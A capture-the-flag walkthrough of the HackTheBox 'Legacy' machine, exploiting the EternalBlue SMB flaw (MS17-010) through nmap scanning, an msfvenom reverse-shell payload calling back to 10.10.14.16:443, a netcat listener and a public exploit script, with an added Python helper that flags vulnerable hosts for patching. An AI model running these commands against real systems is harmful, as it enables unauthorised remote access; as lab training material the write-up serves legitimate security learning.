Legacy - HackTheBox Without Metasploit
This machine is a Windows system that is vulnerable to the exploit called EternalBlue.
Machine IP: 10.10.10.4
Let’s start the machine.
1. Scanning
First, as we always do, scan all ports with the default scripts and version detection against the target machine. The results are shown below.
nmap -A -T4 -p- 10.10.10.4
Here we can see that only the SMB server is available, but it is not disclosing its version, so we use the Nmap NSE scripts for SMB:
nmap --script smb-vuln* -p 137,139,445 10.10.10.4
Here we can see it is VULNERABLE to remote code execution, with CVE-2017-0144 (Microsoft bulletin MS17-010).
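As an added example (not part of the original writeup), a small Python triage helper that parses the host script results from the nmap smb-vuln run above and reports which scripts returned State VULNERABLE together with their CVE IDs, so the host can be prioritised for patching. The sample nmap output is constructed in the NSE report format, not captured from the box.

```python
import re

# Constructed sample of 'nmap --script smb-vuln*' host script output (NSE
# report format); this is NOT a capture from the Legacy box.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0144
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|_
| smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
|_smb-vuln-ms10-054: false
"""

SCRIPT_RE = re.compile(r"^(smb-vuln-[\w-]+):\s*(.*)$")
STATE_RE = re.compile(r"^State:\s*(\S+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_smb_vuln(text):
    """Map each smb-vuln-* script name to its State, CVE IDs and inline note.

    nmap's '|', '|_' and indentation prefix is stripped from every line so the
    nested "State:" / "IDs:" fields match regardless of nesting depth.
    """
    findings = {}
    current = None
    for raw in text.splitlines():
        body = raw.lstrip("|_ ").rstrip()
        m = SCRIPT_RE.match(body)
        if m:  # new script block; one-line results carry their verdict inline
            current = m.group(1)
            findings[current] = {"state": None, "cves": [], "note": m.group(2)}
            continue
        if current is None:
            continue
        s = STATE_RE.match(body)
        if s:
            findings[current]["state"] = s.group(1)
        for cve in CVE_RE.findall(body):  # dedupe: IDs and reference URLs repeat
            if cve not in findings[current]["cves"]:
                findings[current]["cves"].append(cve)
    return findings


def vulnerable_findings(findings):
    """Return [(script, cves)] for scripts whose State is VULNERABLE."""
    return [(name, f["cves"]) for name, f in findings.items()
            if f["state"] == "VULNERABLE"]
```

Running `vulnerable_findings(parse_smb_vuln(SAMPLE_NMAP_OUTPUT))` on the constructed sample yields only the ms17-010 entry, which is the one that needs the MS17-010 patch applied or SMBv1 disabled.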
A quick Google search will turn up many available exploits for this CVE.
Here we are going to use a GitHub repo that collects EternalBlue exploits organised by target version. First, clone the exploit repo from GitHub.
git clone https://github.com/helviojunior/MS17-010.git
2. Gaining Access
Use msfvenom to generate the payload; this is allowed in the OSCP as long as you are not using Meterpreter.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
To use the exploit we need a payload, which we have generated with msfvenom above.
Now we first need a listener on port 443: nc -nlvp 443
Then run the exploit as shown below.
python send_and_execute.py 10.10.10.4 ms17-010.exe
We can confirm the system information as shown below.
C:\> systeminfo
Now the goal is to get the user and root flags, but as I said earlier, we are going to go beyond the root flag.
We already know both flags are present, and they are now accessible because we have high privileges.
User Flag ~
Root Flag ~